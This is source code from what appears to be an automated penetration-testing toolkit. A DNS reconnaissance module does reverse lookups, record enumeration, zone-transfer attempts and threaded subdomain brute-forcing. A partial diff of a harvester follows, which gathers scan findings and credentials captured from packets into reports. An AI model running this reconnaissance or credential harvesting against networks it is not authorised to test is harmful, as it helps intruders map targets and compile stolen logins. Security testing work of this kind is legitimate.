"vpn", "remote", "ssh", "rdp", "citrix", "owa", "exchange",
"db", "database", "mysql", "postgres", "sql", "mongodb", "redis", "elastic",
"shop", "store", "app", "apps", "mobile", "m",
"intranet", "extranet", "internal", "external", "private", "public",
"cloud", "aws", "azure", "gcp", "s3", "storage",
"git", "gitlab", "github", "svn", "repo", "ci", "cd", "jenkins", "build",
"monitor", "monitoring", "grafana", "prometheus", "kibana", "nagios", "zabbix",
"log", "logs", "syslog", "elk",
"chat", "slack", "teams", "jira", "confluence", "wiki",
"backup", "backups", "bak", "archive",
"secure", "security", "sso", "auth", "login", "oauth",
"docs", "doc", "help", "support", "kb", "status",
"calendar", "crm", "erp", "hr",
"web", "web1", "web2", "server", "server1", "server2",
"host", "node", "worker", "master",
]
# DNS record types to enumerate
DNS_RECORD_TYPES = ["A", "AAAA", "MX", "NS", "TXT", "CNAME", "SOA", "SRV", "PTR"]
class DNSPillager:
"""
DNS reconnaissance action for the Bjorn orchestrator.
Performs reverse DNS, record enumeration, zone transfer attempts,
and subdomain brute-force discovery.
"""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
# IP -> (MAC, hostname) identity cache from DB
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
# DNS resolver setup (dnspython)
self._resolver = None
if _HAS_DNSPYTHON:
self._resolver = dns.resolver.Resolver()
self._resolver.timeout = 3
self._resolver.lifetime = 5
# Ensure output directory exists
try:
os.makedirs(OUTPUT_DIR, exist_ok=True)
except Exception as e:
logger.error(f"Failed to create output directory {OUTPUT_DIR}: {e}")
# Thread safety
self._lock = threading.Lock()
logger.info("DNSPillager initialized (dnspython=%s)", _HAS_DNSPYTHON)
# --------------------- Identity cache (hosts) ---------------------
def _refresh_ip_identity_cache(self) -> None:
"""Rebuild IP -> (MAC, current_hostname) from DB.hosts."""
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip_addr in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip_addr] = (mac, current_hn)
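The cache-building loop above flattens the DB's semicolon-joined `hostnames` and `ips` columns into a per-IP map. A minimal standalone sketch of that transformation (the helper name `build_ip_identity` is hypothetical; the row shape mirrors the DB columns used above):

```python
from typing import Dict, List, Optional, Tuple

def build_ip_identity(rows: List[dict]) -> Dict[str, Tuple[Optional[str], Optional[str]]]:
    """Flatten DB host rows into an IP -> (MAC, primary hostname) map."""
    cache: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
    for r in rows:
        mac = r.get("mac_address") or ""
        if not mac:
            continue  # rows without a MAC cannot anchor an identity
        hostnames_txt = r.get("hostnames") or ""
        primary = hostnames_txt.split(";", 1)[0] if hostnames_txt else ""
        for ip in [p.strip() for p in (r.get("ips") or "").split(";") if p.strip()]:
            cache[ip] = (mac, primary)
    return cache

rows = [{"mac_address": "aa:bb", "hostnames": "nas.lan;nas", "ips": "192.168.1.5;10.0.0.5"}]
print(build_ip_identity(rows)["192.168.1.5"])  # ('aa:bb', 'nas.lan')
```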
def _mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def _hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# --------------------- Public API (Orchestrator) ---------------------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
"""
Execute DNS reconnaissance on the given target.
Args:
ip: Target IP address
port: Target port (typically 53)
row: Row dict from orchestrator (contains MAC, hostname, etc.)
status_key: Status tracking key
Returns:
'success' | 'failed' | 'interrupted'
"""
self.shared_data.bjorn_orch_status = "DNSPillager"
self.shared_data.bjorn_progress = "0%"
self.shared_data.comment_params = {"ip": ip, "port": str(port), "phase": "init"}
results = {
"target_ip": ip,
"port": str(port),
"timestamp": datetime.datetime.now().isoformat(),
"reverse_dns": None,
"domain": None,
"records": {},
"zone_transfer": {},
"subdomains": [],
"errors": [],
}
try:
# --- Check for early exit ---
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal before start.")
return "interrupted"
mac = row.get("MAC Address") or row.get("mac_address") or self._mac_for_ip(ip) or ""
hostname = (
row.get("Hostname") or row.get("hostname")
or self._hostname_for_ip(ip)
or ""
)
# =========================================================
# Phase 1: Reverse DNS lookup (0% -> 10%)
# =========================================================
self.shared_data.comment_params = {"ip": ip, "phase": "reverse_dns"}
logger.info(f"[{ip}] Phase 1: Reverse DNS lookup")
reverse_hostname = self._reverse_dns(ip)
if reverse_hostname:
results["reverse_dns"] = reverse_hostname
logger.info(f"[{ip}] Reverse DNS: {reverse_hostname}")
self.shared_data.log_milestone(b_class, "ReverseDNS", f"IP: {ip} -> {reverse_hostname}")
# Update hostname if we found something new
if not hostname or hostname == ip:
hostname = reverse_hostname
else:
logger.info(f"[{ip}] No reverse DNS result.")
self.shared_data.bjorn_progress = "10%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 2: Extract domain and enumerate DNS records (10% -> 35%)
# =========================================================
domain = self._extract_domain(hostname)
results["domain"] = domain
if domain:
self.shared_data.comment_params = {"ip": ip, "phase": "records", "domain": domain}
logger.info(f"[{ip}] Phase 2: DNS record enumeration for {domain}")
self.shared_data.log_milestone(b_class, "EnumerateRecords", f"Domain: {domain}")
record_results = {}
total_types = len(DNS_RECORD_TYPES)
for idx, rtype in enumerate(DNS_RECORD_TYPES):
if self.shared_data.orchestrator_should_exit:
return "interrupted"
records = self._query_records(domain, rtype)
if records:
record_results[rtype] = records
logger.info(f"[{ip}] {rtype} records for {domain}: {records}")
# Progress: 10% -> 35% across record types
pct = 10 + int((idx + 1) / total_types * 25)
self.shared_data.bjorn_progress = f"{pct}%"
results["records"] = record_results
else:
logger.warning(f"[{ip}] No domain could be extracted. Skipping record enumeration.")
self.shared_data.bjorn_progress = "35%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 3: Zone transfer (AXFR) attempt (35% -> 45%)
# =========================================================
self.shared_data.bjorn_progress = "35%"
self.shared_data.comment_params = {"ip": ip, "phase": "zone_transfer", "domain": domain or ip}
if domain and _HAS_DNSPYTHON:
logger.info(f"[{ip}] Phase 3: Zone transfer attempt for {domain}")
nameservers = results["records"].get("NS", [])
# Also try the target IP itself as a nameserver
ns_targets = list(set(nameservers + [ip]))
zone_results = {}
for ns_idx, ns in enumerate(ns_targets):
if self.shared_data.orchestrator_should_exit:
return "interrupted"
axfr_records = self._attempt_zone_transfer(domain, ns)
if axfr_records:
zone_results[ns] = axfr_records
logger.success(f"[{ip}] Zone transfer SUCCESS from {ns}: {len(axfr_records)} records")
self.shared_data.log_milestone(b_class, "AXFRSuccess", f"NS: {ns} | Records: {len(axfr_records)}")
# Progress within 35% -> 45%
if ns_targets:
pct = 35 + int((ns_idx + 1) / len(ns_targets) * 10)
self.shared_data.bjorn_progress = f"{pct}%"
results["zone_transfer"] = zone_results
else:
if not _HAS_DNSPYTHON:
results["errors"].append("Zone transfer skipped: dnspython not available")
elif not domain:
results["errors"].append("Zone transfer skipped: no domain found")
logger.info(f"[{ip}] Skipping zone transfer (dnspython={_HAS_DNSPYTHON}, domain={domain})")
self.shared_data.bjorn_progress = "45%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 4: Subdomain brute-force (45% -> 95%)
# =========================================================
self.shared_data.comment_params = {"ip": ip, "phase": "subdomains", "domain": domain or ip}
if domain:
logger.info(f"[{ip}] Phase 4: Subdomain brute-force for {domain}")
self.shared_data.log_milestone(b_class, "SubdomainEnum", f"Domain: {domain}")
wordlist = self._load_wordlist()
thread_count = min(10, max(1, len(wordlist)))
discovered = self._enumerate_subdomains(domain, wordlist, thread_count)
results["subdomains"] = discovered
logger.info(f"[{ip}] Subdomain enumeration found {len(discovered)} live subdomains")
else:
logger.info(f"[{ip}] Skipping subdomain enumeration: no domain available")
results["errors"].append("Subdomain enumeration skipped: no domain found")
self.shared_data.bjorn_progress = "95%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 5: Save results and update DB (95% -> 100%)
# =========================================================
self.shared_data.comment_params = {"ip": ip, "phase": "saving"}
logger.info(f"[{ip}] Phase 5: Saving results")
# Save JSON output
self._save_results(ip, results)
# Update DB hostname if reverse DNS discovered new data
if reverse_hostname and mac:
self._update_db_hostname(mac, ip, reverse_hostname)
self.shared_data.bjorn_progress = "100%"
self.shared_data.log_milestone(b_class, "Complete", f"Records: {sum(len(v) for v in results['records'].values())} | Subdomains: {len(results['subdomains'])}")
# Summary comment
record_count = sum(len(v) for v in results["records"].values())
zone_count = sum(len(v) for v in results["zone_transfer"].values())
sub_count = len(results["subdomains"])
self.shared_data.comment_params = {
"ip": ip,
"domain": domain or "N/A",
"records": str(record_count),
"zones": str(zone_count),
"subdomains": str(sub_count),
}
logger.success(
f"[{ip}] DNS Pillager complete: domain={domain}, "
f"records={record_count}, zone_transfers={zone_count}, subdomains={sub_count}"
)
return "success"
except Exception as e:
logger.error(f"[{ip}] DNSPillager execute failed: {e}")
results["errors"].append(str(e))
# Still try to save partial results
try:
self._save_results(ip, results)
except Exception:
pass
return "failed"
finally:
self.shared_data.bjorn_progress = ""
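The phase boundaries used in `execute()` (0→10→35→45→95→100%) can be captured as a small mapping from phase name and completion fraction to a progress string. A sketch of that idea (`phase_progress` and `PHASE_WINDOWS` are hypothetical helpers, not part of the module):

```python
# Progress windows matching the phase comments in execute()
PHASE_WINDOWS = {
    "reverse_dns": (0, 10),
    "records": (10, 35),
    "zone_transfer": (35, 45),
    "subdomains": (45, 95),
    "saving": (95, 100),
}

def phase_progress(phase: str, fraction: float) -> str:
    """Map a 0.0-1.0 completion fraction onto the phase's progress window."""
    lo, hi = PHASE_WINDOWS[phase]
    return f"{lo + int(fraction * (hi - lo))}%"

print(phase_progress("records", 0.5))     # 22%
print(phase_progress("subdomains", 1.0))  # 95%
```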
# --------------------- Reverse DNS ---------------------
def _reverse_dns(self, ip: str) -> Optional[str]:
"""Perform reverse DNS lookup on the IP address."""
# Try dnspython first
if _HAS_DNSPYTHON and self._resolver:
try:
rev_name = dns.reversename.from_address(ip)
answers = self._resolver.resolve(rev_name, "PTR")
for rdata in answers:
hostname = str(rdata).rstrip(".")
if hostname:
return hostname
except Exception as e:
logger.debug(f"dnspython reverse DNS failed for {ip}: {e}")
# Socket fallback
try:
hostname, _, _ = socket.gethostbyaddr(ip)
if hostname and hostname != ip:
return hostname
except (socket.herror, socket.gaierror, OSError) as e:
logger.debug(f"Socket reverse DNS failed for {ip}: {e}")
return None
# --------------------- Domain extraction ---------------------
@staticmethod
def _extract_domain(hostname: str) -> Optional[str]:
"""
Extract the registerable domain from a hostname.
e.g., 'mail.sub.example.com' -> 'example.com'
'host1.internal.lan' -> 'internal.lan'
'192.168.1.1' -> None
"""
if not hostname:
return None
# Skip raw IPs
hostname = hostname.strip().rstrip(".")
parts = hostname.split(".")
if len(parts) < 2:
return None
# Check if it looks like an IP address
try:
socket.inet_aton(hostname)
return None # It's an IP, not a hostname
except (socket.error, OSError):
pass
# For simple TLDs, take the last 2 parts
# For compound TLDs (co.uk, com.au), take the last 3 parts
compound_tlds = {
"co.uk", "co.jp", "co.kr", "co.nz", "co.za", "co.in",
"com.au", "com.br", "com.cn", "com.mx", "com.tw",
"org.uk", "net.au", "ac.uk", "gov.uk",
}
if len(parts) >= 3:
possible_compound = f"{parts[-2]}.{parts[-1]}"
if possible_compound.lower() in compound_tlds:
return ".".join(parts[-3:])
return ".".join(parts[-2:])
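The compound-TLD handling above can be exercised in isolation. A minimal standalone sketch mirroring the method's logic (the function name `extract_domain` and the trimmed TLD set are illustrative):

```python
import socket
from typing import Optional

COMPOUND_TLDS = {"co.uk", "com.au", "org.uk"}

def extract_domain(hostname: str) -> Optional[str]:
    """Return the registerable domain, or None for raw IPs and bare names."""
    if not hostname:
        return None
    hostname = hostname.strip().rstrip(".")
    parts = hostname.split(".")
    if len(parts) < 2:
        return None
    try:
        socket.inet_aton(hostname)  # parses -> it is an IPv4 address, not a hostname
        return None
    except OSError:
        pass
    if len(parts) >= 3 and f"{parts[-2]}.{parts[-1]}".lower() in COMPOUND_TLDS:
        return ".".join(parts[-3:])  # compound TLD: keep three labels
    return ".".join(parts[-2:])

print(extract_domain("mail.sub.example.com"))  # example.com
print(extract_domain("web.example.co.uk"))     # example.co.uk
print(extract_domain("192.168.1.1"))           # None
```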
# --------------------- DNS record queries ---------------------
def _query_records(self, domain: str, record_type: str) -> List[str]:
"""Query DNS records of a given type for a domain."""
records = []
# Try dnspython first
if _HAS_DNSPYTHON and self._resolver:
try:
answers = self._resolver.resolve(domain, record_type)
for rdata in answers:
value = str(rdata).rstrip(".")
if value:
records.append(value)
return records
except dns.resolver.NXDOMAIN:
logger.debug(f"NXDOMAIN for {domain} {record_type}")
except dns.resolver.NoAnswer:
logger.debug(f"No answer for {domain} {record_type}")
except dns.resolver.NoNameservers:
logger.debug(f"No nameservers for {domain} {record_type}")
except dns.exception.Timeout:
logger.debug(f"Timeout querying {domain} {record_type}")
except Exception as e:
logger.debug(f"dnspython query failed for {domain} {record_type}: {e}")
# Socket fallback (limited to A records only)
if record_type == "A" and not records:
try:
ips = socket.getaddrinfo(domain, None, socket.AF_INET, socket.SOCK_STREAM)
for info in ips:
addr = info[4][0]
if addr and addr not in records:
records.append(addr)
except (socket.gaierror, OSError) as e:
logger.debug(f"Socket fallback failed for {domain} A: {e}")
# Socket fallback for AAAA
if record_type == "AAAA" and not records:
try:
ips = socket.getaddrinfo(domain, None, socket.AF_INET6, socket.SOCK_STREAM)
for info in ips:
addr = info[4][0]
if addr and addr not in records:
records.append(addr)
except (socket.gaierror, OSError) as e:
logger.debug(f"Socket fallback failed for {domain} AAAA: {e}")
return records
# --------------------- Zone transfer (AXFR) ---------------------
def _attempt_zone_transfer(self, domain: str, nameserver: str) -> List[Dict]:
"""
Attempt an AXFR zone transfer from a nameserver.
Returns a list of record dicts on success, empty list on failure.
"""
if not _HAS_DNSPYTHON:
return []
records = []
# Resolve NS hostname to IP if needed
ns_ip = self._resolve_ns_to_ip(nameserver)
if not ns_ip:
logger.debug(f"Cannot resolve NS {nameserver} to IP, skipping AXFR")
return []
try:
zone = dns.zone.from_xfr(
dns.query.xfr(ns_ip, domain, timeout=10, lifetime=30)
)
for name, node in zone.nodes.items():
for rdataset in node.rdatasets:
for rdata in rdataset:
records.append({
"name": str(name),
"type": dns.rdatatype.to_text(rdataset.rdtype),
"ttl": rdataset.ttl,
"value": str(rdata),
})
except dns.exception.FormError:
logger.debug(f"AXFR refused by {nameserver} ({ns_ip}) for {domain}")
except dns.exception.Timeout:
logger.debug(f"AXFR timeout from {nameserver} ({ns_ip}) for {domain}")
except ConnectionError as e:
logger.debug(f"AXFR connection error from {nameserver}: {e}")
except OSError as e:
logger.debug(f"AXFR OS error from {nameserver}: {e}")
except Exception as e:
logger.debug(f"AXFR failed from {nameserver} ({ns_ip}) for {domain}: {e}")
return records
def _resolve_ns_to_ip(self, nameserver: str) -> Optional[str]:
"""Resolve a nameserver hostname to an IP address."""
ns = nameserver.strip().rstrip(".")
# Check if already an IP
try:
socket.inet_aton(ns)
return ns
except (socket.error, OSError):
pass
# Try to resolve via dnspython
if _HAS_DNSPYTHON and self._resolver:
try:
answers = self._resolver.resolve(ns, "A")
for rdata in answers:
return str(rdata)
except Exception:
pass
# Socket fallback
try:
result = socket.getaddrinfo(ns, 53, socket.AF_INET, socket.SOCK_STREAM)
if result:
return result[0][4][0]
except Exception:
pass
return None
# --------------------- Subdomain enumeration ---------------------
def _load_wordlist(self) -> List[str]:
"""Load subdomain wordlist from file or use built-in list."""
# Check for configured wordlist path
wordlist_path = ""
if hasattr(self.shared_data, "config") and self.shared_data.config:
wordlist_path = self.shared_data.config.get("dns_wordlist", "")
if wordlist_path and os.path.isfile(wordlist_path):
try:
with open(wordlist_path, "r", encoding="utf-8", errors="ignore") as f:
words = [line.strip() for line in f if line.strip() and not line.startswith("#")]
if words:
logger.info(f"Loaded {len(words)} subdomains from {wordlist_path}")
return words
except Exception as e:
logger.error(f"Failed to load wordlist {wordlist_path}: {e}")
logger.info(f"Using built-in subdomain wordlist ({len(BUILTIN_SUBDOMAINS)} entries)")
return list(BUILTIN_SUBDOMAINS)
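The wordlist loading above keeps non-empty lines and skips `#` comments. A standalone sketch of the same filter (`parse_wordlist` is a hypothetical name; the module reads from a file, this operates on a string for clarity):

```python
from typing import List

def parse_wordlist(text: str) -> List[str]:
    """Keep stripped, non-empty lines that do not start with '#'."""
    return [line.strip() for line in text.splitlines()
            if line.strip() and not line.startswith("#")]

print(parse_wordlist("www\n# infra hosts\nmail\n\nftp\n"))  # ['www', 'mail', 'ftp']
```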
def _enumerate_subdomains(
self, domain: str, wordlist: List[str], thread_count: int
) -> List[Dict]:
"""
Brute-force subdomain enumeration using ThreadPoolExecutor.
Returns a list of discovered subdomain dicts.
"""
discovered: List[Dict] = []
total = len(wordlist)
if total == 0:
return discovered
completed = [0] # mutable counter for thread-safe progress
def check_subdomain(sub: str) -> Optional[Dict]:
"""Check if a subdomain resolves."""
if self.shared_data.orchestrator_should_exit:
return None
fqdn = f"{sub}.{domain}"
result = None
# Try dnspython
if _HAS_DNSPYTHON and self._resolver:
try:
answers = self._resolver.resolve(fqdn, "A")
ips = [str(rdata) for rdata in answers]
if ips:
result = {
"subdomain": sub,
"fqdn": fqdn,
"ips": ips,
"method": "dns",
}
except Exception:
pass
# Socket fallback
if result is None:
try:
addr_info = socket.getaddrinfo(fqdn, None, socket.AF_INET, socket.SOCK_STREAM)
ips = list(set(info[4][0] for info in addr_info))
if ips:
result = {
"subdomain": sub,
"fqdn": fqdn,
"ips": ips,
"method": "socket",
}
except (socket.gaierror, OSError):
pass
# Update progress atomically
with self._lock:
completed[0] += 1
# Progress: 45% -> 95% across subdomain enumeration
pct = 45 + int((completed[0] / total) * 50)
pct = min(pct, 95)
self.shared_data.bjorn_progress = f"{pct}%"
return result
try:
with ThreadPoolExecutor(max_workers=thread_count) as executor:
futures = {
executor.submit(check_subdomain, sub): sub for sub in wordlist
}
for future in as_completed(futures):
if self.shared_data.orchestrator_should_exit:
# Cancel remaining futures
for f in futures:
f.cancel()
logger.info("Subdomain enumeration interrupted by orchestrator.")
break
try:
result = future.result(timeout=15)
if result:
with self._lock:
discovered.append(result)
logger.info(
f"Subdomain found: {result['fqdn']} -> {result['ips']}"
)
self.shared_data.comment_params = {
"ip": domain,
"phase": "subdomains",
"found": str(len(discovered)),
"last": result["fqdn"],
}
except Exception as e:
logger.debug(f"Subdomain future error: {e}")
except Exception as e:
logger.error(f"Subdomain enumeration thread pool error: {e}")
return discovered
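The enumeration above reports progress from worker threads through a lock-guarded mutable counter (`completed = [0]`). A minimal, self-contained sketch of that pattern with `ThreadPoolExecutor` (all names here are illustrative, not from the module):

```python
import threading
from concurrent.futures import ThreadPoolExecutor, as_completed

def run_with_progress(items, work, workers=4):
    """Run `work` over items in a thread pool, counting completions under a lock."""
    lock = threading.Lock()
    completed = [0]  # mutable cell shared across worker threads
    results = []

    def wrapper(item):
        out = work(item)
        with lock:  # serialize the counter update
            completed[0] += 1
        return out

    with ThreadPoolExecutor(max_workers=workers) as pool:
        futures = [pool.submit(wrapper, it) for it in items]
        for fut in as_completed(futures):
            res = fut.result()
            if res is not None:  # None means "no finding", like check_subdomain
                results.append(res)
    return results, completed[0]

results, done = run_with_progress(range(10), lambda x: x * 2 if x % 2 == 0 else None)
print(done)  # 10
```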
# --------------------- Result saving ---------------------
def _save_results(self, ip: str, results: Dict) -> None:
"""Save DNS reconnaissance results to a JSON file."""
try:
os.makedirs(OUTPUT_DIR, exist_ok=True)
safe_ip = ip.replace(":", "_").replace(".", "_")
timestamp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
filename = f"dns_{safe_ip}_{timestamp}.json"
filepath = os.path.join(OUTPUT_DIR, filename)
with open(filepath, "w", encoding="utf-8") as f:
json.dump(results, f, indent=2, default=str)
logger.info(f"Results saved to {filepath}")
except Exception as e:
logger.error(f"Failed to save results for {ip}: {e}")
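The filename sanitization above makes IPv4 dots and IPv6 colons filesystem-safe before building the output path. A standalone sketch of just that step (`results_filename` is a hypothetical helper mirroring the logic above):

```python
def results_filename(ip: str, timestamp: str) -> str:
    """Build a filesystem-safe JSON filename from an IP and a timestamp string."""
    safe_ip = ip.replace(":", "_").replace(".", "_")
    return f"dns_{safe_ip}_{timestamp}.json"

print(results_filename("192.168.1.10", "20260316_220951"))
# dns_192_168_1_10_20260316_220951.json
```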
# --------------------- DB hostname update ---------------------
def _update_db_hostname(self, mac: str, ip: str, new_hostname: str) -> None:
"""Update the hostname in the hosts DB table if we found new DNS data."""
if not mac or not new_hostname:
return
try:
rows = self.shared_data.db.query(
"SELECT hostnames FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
)
if not rows:
return
existing = rows[0].get("hostnames") or ""
existing_set = set(h.strip() for h in existing.split(";") if h.strip())
if new_hostname not in existing_set:
existing_set.add(new_hostname)
updated = ";".join(sorted(existing_set))
self.shared_data.db.execute(
"UPDATE hosts SET hostnames=? WHERE mac_address=?",
(updated, mac),
)
logger.info(f"Updated DB hostname for MAC {mac}: added {new_hostname}")
# Refresh our local cache
self._refresh_ip_identity_cache()
except Exception as e:
logger.error(f"Failed to update DB hostname for MAC {mac}: {e}")
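The `hostnames` column stores a semicolon-joined, deduplicated set, and the update above merges a new name into it. The merge step can be sketched standalone (`merge_hostnames` is a hypothetical name for the logic used above):

```python
def merge_hostnames(existing: str, new_hostname: str) -> str:
    """Add a hostname to a semicolon-joined list, deduplicated and sorted."""
    names = {h.strip() for h in existing.split(";") if h.strip()}
    names.add(new_hostname)
    return ";".join(sorted(names))

print(merge_hostnames("printer.lan;nas.lan", "router.lan"))
# nas.lan;printer.lan;router.lan
```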
# ---------------------------------------------------------------------------
# CLI mode (debug / manual execution)
# ---------------------------------------------------------------------------
if __name__ == "__main__":
shared_data = SharedData()
try:
pillager = DNSPillager(shared_data)
logger.info("DNS Pillager module ready (CLI mode).")
rows = shared_data.read_data()
for row in rows:
ip = row.get("IPs") or row.get("ip")
if not ip:
continue
port = row.get("port") or 53
logger.info(f"Execute DNSPillager on {ip}:{port} ...")
status = pillager.execute(ip, str(port), row, "dns_pillager")
if status == "success":
logger.success(f"DNS recon successful for {ip}:{port}.")
elif status == "interrupted":
logger.warning(f"DNS recon interrupted for {ip}:{port}.")
break
else:
logger.failed(f"DNS recon failed for {ip}:{port}.")
logger.info("DNS Pillager CLI execution completed.")
except Exception as e:
logger.error(f"Error: {e}")
exit(1)


@@ -1,457 +1,165 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
freya_harvest.py -- Data collection and intelligence aggregation for BJORN.
Monitors output directories and generates consolidated reports.
"""
import os
import json
import argparse
import logging
import time
import shutil
import glob
import threading
import watchdog.observers
import watchdog.events
import markdown
import jinja2
from datetime import datetime
from collections import defaultdict
from typing import Any, Dict, List, Optional
from logger import Logger
logger = Logger(name="freya_harvest.py")
# -------------------- Action metadata --------------------
b_class = "FreyaHarvest"
b_module = "freya_harvest"
b_status = "freya_harvest"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "normal"
b_priority = 50
b_cooldown = 0
b_rate_limit = None
b_timeout = 1800
b_max_retries = 1
b_stealth_level = 10 # Local file processing is stealthy
b_risk_level = "low"
b_enabled = 1
b_tags = ["harvest", "report", "aggregator", "intel"]
b_category = "recon"
b_name = "Freya Harvest"
b_description = "Aggregates findings from all modules into consolidated intelligence reports."
b_author = "Bjorn Team"
b_version = "2.0.4"
b_icon = "FreyaHarvest.png"
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# Default settings
DEFAULT_INPUT_DIR = "/home/bjorn/Bjorn/data/output"
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/reports"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "freya_harvest_settings.json")
# HTML template for reports
HTML_TEMPLATE = """
<!DOCTYPE html>
<html>
<head>
<title>Bjorn Reconnaissance Report</title>
<style>
body { font-family: Arial, sans-serif; margin: 20px; }
.section { margin: 20px 0; padding: 10px; border: 1px solid #ddd; }
.vuln-high { background-color: #ffebee; }
.vuln-medium { background-color: #fff3e0; }
.vuln-low { background-color: #f1f8e9; }
table { border-collapse: collapse; width: 100%; margin-bottom: 20px; }
th, td { border: 1px solid #ddd; padding: 8px; text-align: left; }
th { background-color: #f5f5f5; }
h1, h2, h3 { color: #333; }
.metadata { color: #666; font-style: italic; }
.timestamp { font-weight: bold; }
</style>
</head>
<body>
<h1>Bjorn Reconnaissance Report</h1>
<div class="metadata">
<p class="timestamp">Generated: {{ timestamp }}</p>
</div>
{% for section in sections %}
<div class="section">
<h2>{{ section.title }}</h2>
{{ section.content }}
</div>
{% endfor %}
</body>
</html>
"""
b_args = {
"input_dir": {
"type": "text",
"label": "Input Data Dir",
"default": "/home/bjorn/Bjorn/data/output"
},
"output_dir": {
"type": "text",
"label": "Reports Dir",
"default": "/home/bjorn/Bjorn/data/reports"
},
"watch": {
"type": "checkbox",
"label": "Continuous Watch",
"default": True
},
"format": {
"type": "select",
"label": "Report Format",
"choices": ["json", "md", "all"],
"default": "all"
}
}
class FreyaHarvest:
def __init__(self, shared_data=None, input_dir=DEFAULT_INPUT_DIR, output_dir=DEFAULT_OUTPUT_DIR,
formats=None, watch_mode=False, clean=False):
# Merged constructor: accepts the orchestrator's shared_data plus the legacy CLI options
self.shared_data = shared_data
self.input_dir = input_dir
self.output_dir = output_dir
self.formats = formats or ['json', 'html', 'md']
self.watch_mode = watch_mode
self.clean = clean
self.data = defaultdict(list)
self.observer = None
self.lock = threading.Lock()
self.last_scan_time = 0
def clean_directories(self):
"""Clean output directory if requested."""
if self.clean and os.path.exists(self.output_dir):
shutil.rmtree(self.output_dir)
os.makedirs(self.output_dir)
logging.info(f"Cleaned output directory: {self.output_dir}")
def collect_wifi_data(self):
"""Collect WiFi-related findings."""
try:
wifi_dir = os.path.join(self.input_dir, "wifi")
if os.path.exists(wifi_dir):
for file in glob.glob(os.path.join(wifi_dir, "*.json")):
with open(file, 'r') as f:
data = json.load(f)
self.data['wifi'].append(data)
except Exception as e:
logging.error(f"Error collecting WiFi data: {e}")
def collect_network_data(self):
"""Collect network topology and host findings."""
try:
network_dir = os.path.join(self.input_dir, "topology")
if os.path.exists(network_dir):
for file in glob.glob(os.path.join(network_dir, "*.json")):
with open(file, 'r') as f:
data = json.load(f)
self.data['network'].append(data)
except Exception as e:
logging.error(f"Error collecting network data: {e}")
def collect_vulnerability_data(self):
"""Collect vulnerability findings."""
try:
vuln_dir = os.path.join(self.input_dir, "webscan")
if os.path.exists(vuln_dir):
for file in glob.glob(os.path.join(vuln_dir, "*.json")):
with open(file, 'r') as f:
data = json.load(f)
self.data['vulnerabilities'].append(data)
except Exception as e:
logging.error(f"Error collecting vulnerability data: {e}")
def collect_credential_data(self):
"""Collect credential findings."""
try:
cred_dir = os.path.join(self.input_dir, "packets")
if os.path.exists(cred_dir):
for file in glob.glob(os.path.join(cred_dir, "*.json")):
with open(file, 'r') as f:
data = json.load(f)
self.data['credentials'].append(data)
except Exception as e:
logging.error(f"Error collecting credential data: {e}")
def collect_data(self):
"""Collect all data from various sources."""
self.data.clear() # Reset data before collecting
self.collect_wifi_data()
self.collect_network_data()
self.collect_vulnerability_data()
self.collect_credential_data()
logging.info("Data collection completed")
def generate_json_report(self):
"""Generate JSON format report."""
try:
report = {
'timestamp': datetime.now().isoformat(),
'findings': dict(self.data)
}
os.makedirs(self.output_dir, exist_ok=True)
output_file = os.path.join(self.output_dir,
f"report_{datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}.json")
with open(output_file, 'w') as f:
json.dump(report, f, indent=4)
logging.info(f"JSON report saved to {output_file}")
except Exception as e:
logging.error(f"Error generating JSON report: {e}")
def generate_html_report(self):
"""Generate HTML format report."""
try:
template = jinja2.Template(HTML_TEMPLATE)
sections = []
# Network Section
if self.data['network']:
content = "<h3>Network Topology</h3>"
for topology in self.data['network']:
content += f"<p>Hosts discovered: {len(topology.get('hosts', []))}</p>"
content += "<table><tr><th>IP</th><th>MAC</th><th>Open Ports</th><th>Status</th></tr>"
for ip, data in topology.get('hosts', {}).items():
ports = data.get('ports', [])
mac = data.get('mac', 'Unknown')
status = data.get('status', 'Unknown')
content += f"<tr><td>{ip}</td><td>{mac}</td><td>{', '.join(map(str, ports))}</td><td>{status}</td></tr>"
content += "</table>"
sections.append({"title": "Network Information", "content": content})
# WiFi Section
if self.data['wifi']:
content = "<h3>WiFi Findings</h3>"
for wifi_data in self.data['wifi']:
content += "<table><tr><th>SSID</th><th>BSSID</th><th>Security</th><th>Signal</th><th>Channel</th></tr>"
for network in wifi_data.get('networks', []):
content += f"<tr><td>{network.get('ssid', 'Unknown')}</td>"
content += f"<td>{network.get('bssid', 'Unknown')}</td>"
content += f"<td>{network.get('security', 'Unknown')}</td>"
content += f"<td>{network.get('signal_strength', 'Unknown')}</td>"
content += f"<td>{network.get('channel', 'Unknown')}</td></tr>"
